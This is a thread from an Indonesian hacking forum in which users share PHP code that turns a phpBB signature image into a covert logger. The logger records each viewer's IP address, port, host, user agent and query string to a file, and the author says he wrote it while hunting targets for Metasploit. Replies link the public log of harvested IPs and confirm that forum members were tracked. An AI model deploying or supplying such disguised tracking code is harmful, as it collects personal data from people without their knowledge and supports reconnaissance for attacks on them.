IP Address Harvesting Lewat Signature (PHPBB)

[shad.hckr]

awalnya iseng bikin IP visitor tapi kujadiin image biar bisa dipasang di signature forum Xcode tercinta..
ternyata bisa tampil dengan sempurna dengan code :

Code: Select all

<?php

$sh4d = ' sh4dhckr said your IP is '.$_SERVER['REMOTE_ADDR'].' ';

$i = imagecreate(strlen($sh4d)*8,15);
$b = imagecolorallocate($i,0,0,0);
$t = imagecolorallocate($i,0,255,0);
imagestring($i,4,2,0,$sh4d,$t);

header('Content-type: image/gif');
imagegif($i);
imagedestroy($i);

?>

trus pas lagi iseng nyari mangsa buat metasploit tau2 dapet ide buat IP Logger di Forum..
aku sisipin code buat log IP :

Code: Select all

<?
$log="log.txt";
$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_SERVER['QUERY_STRING'];
$rem_host = $_SERVER['REMOTE_HOST'];
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$file = fopen($log,'a+');

echo fwrite($file, "IP: $ip \nPORT: $rem_port \nHOST: $rem_host \nAgent: $user_agent \nMETHOD: $rqst_method \nCOOKIE:  $cookie \n\n"); 
fclose($file);

?>

habis itu aku cek di log ternyata BERHASIL.. :kaca: :kaca:

sekian.. semoga bermanfaat.. :maaf: :maaf: :maaf:

[poni]

IP Harvesting.. cool. nice share brother..
tuh hasil panen IP na dibawah ini

Code: Select all

http://sh4dhckr.com/tools/log.txt

[shad.hckr]

iseng aja pak.. :circle: :circle:
kayaknya ada yang diedit tuh.. :p ckikikiki.. :licik: :licik: :licik:
tapi gak papa kok om.. :ngakak: :ngakak:
biar agak sopan dikit ya om.. :malumalu: :malumalu: :malumalu:
hohohoho..

EDITED : ternyata gak diedit.. tapi kena sensor kata mutiara forum.. :p

[vodork]

awalnya iseng bikin IP visitor tapi kujadiin image biar bisa dipasang di signature forum Xcode tercinta..
ternyata bisa tampil dengan sempurna dengan code :

Code: Select all

<?php

$sh4d = ' sh4dhckr said your IP is '.$_SERVER['REMOTE_ADDR'].' ';

$i = imagecreate(strlen($sh4d)*8,15);
$b = imagecolorallocate($i,0,0,0);
$t = imagecolorallocate($i,0,255,0);
imagestring($i,4,2,0,$sh4d,$t);

header('Content-type: image/gif');
imagegif($i);
imagedestroy($i);
?>

trus pas lagi iseng nyari mangsa buat metasploit tau2 dapet ide buat IP Logger di Forum..
aku sisipin code buat log IP :

Code: Select all

<?
$log="log.txt";
$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_SERVER['QUERY_STRING'];
$rem_host = $_SERVER['REMOTE_HOST'];
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$file = fopen($log,'a+');

echo fwrite($file, "IP: $ip \nPORT: $rem_port \nHOST: $rem_host \nAgent: $user_agent \nMETHOD: $rqst_method \nCOOKIE:  $cookie \n\n"); 
fclose($file);

?>

habis itu aku cek di log ternyata BERHASIL.. :kaca: :kaca:

sekian.. semoga bermanfaat.. :maaf: :maaf: :maaf:

ipku mlebu nang logmu :gebrak: :gebrak:

[Xshadow]

trus korbannya anak xcode juga?

[t3cm4n]

Mantab bro and lanjut kan he..e..e..yg lebih seru

[shad.hckr]

@master Xshadow
iya mas.. saya sudah confirm sama mas poni di channel #xcode tentang masalah signature ini dan beliau bilang nggak papa. publish aja.

log yang masuk salah satunya juga dari forum ini. apabila ada yang tidak berkenan dengan log tersebut akan saya hapus log dan signature tersebut. namun tidak menutup kemungkinan ada pihak lain yang memanfaatkannya di forum ini juga.
:maaf: :maaf: :maaf: :maaf: :maaf: :maaf: